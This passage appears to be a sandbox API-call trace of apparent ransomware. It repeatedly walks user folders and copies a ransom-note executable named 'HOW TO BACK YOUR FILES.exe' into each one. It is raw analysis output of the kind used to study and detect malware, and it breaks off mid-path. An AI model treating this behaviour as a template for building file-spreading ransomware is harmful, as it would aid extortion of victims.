returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec" [0104.479] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.479] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\data\\cjw3o3kp.bx7\\6ng60cxz.9gj\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.480] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.480] GetLastError () returned 0x0 [0104.480] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.480] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f47a600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f47a600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.481] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.481] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.481] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data" [0104.481] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data" [0104.481] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.481] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\data\\cjw3o3kp.bx7\\6ng60cxz.9gj\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.482] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.482] GetLastError () returned 0x0 [0104.482] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.482] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f4a0760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f4a0760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.482] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.482] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.482] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data" [0104.483] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data" [0104.483] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.483] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.483] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.484] GetLastError () returned 0x0 [0104.484] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.484] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x69dd2120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x69dd2120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.484] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.484] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.484] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\VirtualStore", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\VirtualStore") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\VirtualStore" [0104.485] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\VirtualStore" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\VirtualStore") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\VirtualStore" [0104.485] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.485] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\VirtualStore\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\virtualstore\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.485] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.486] GetLastError () returned 0x0 [0104.486] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.486] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\VirtualStore\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d457d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d457d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.486] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.486] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.486] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files" [0104.486] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files" [0104.486] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.486] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.487] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.487] GetLastError () returned 0x0 [0104.488] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.488] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x69df8280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x69df8280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.488] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.488] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.488] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized" [0104.488] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized" [0104.488] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.488] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.489] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.489] GetLastError () returned 0x0 [0104.490] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.490] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d47de60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d47de60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.490] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.490] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.490] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C" [0104.490] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C" [0104.490] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.490] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\virtualized\\c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.491] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.491] GetLastError () returned 0x0 [0104.491] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.491] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f82a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4d47de60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d47de60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.491] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.491] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.492] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users" [0104.492] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users" [0104.492] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.492] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\virtualized\\c\\users\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.492] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.493] GetLastError () returned 0x0 [0104.493] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.493] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f82a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4d4a3fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d4a3fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.493] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.493] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.493] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz" [0104.493] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz" [0104.493] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.494] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\virtualized\\c\\users\\5p5nrgjn0js halpmcxz\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.494] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.494] GetLastError () returned 0x0 [0104.495] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.495] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f82a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4d4a3fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d4a3fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.495] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.495] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.495] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0104.495] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0104.495] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.495] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\virtualized\\c\\users\\5p5nrgjn0js halpmcxz\\appdata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.496] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.496] GetLastError () returned 0x0 [0104.496] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.496] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local 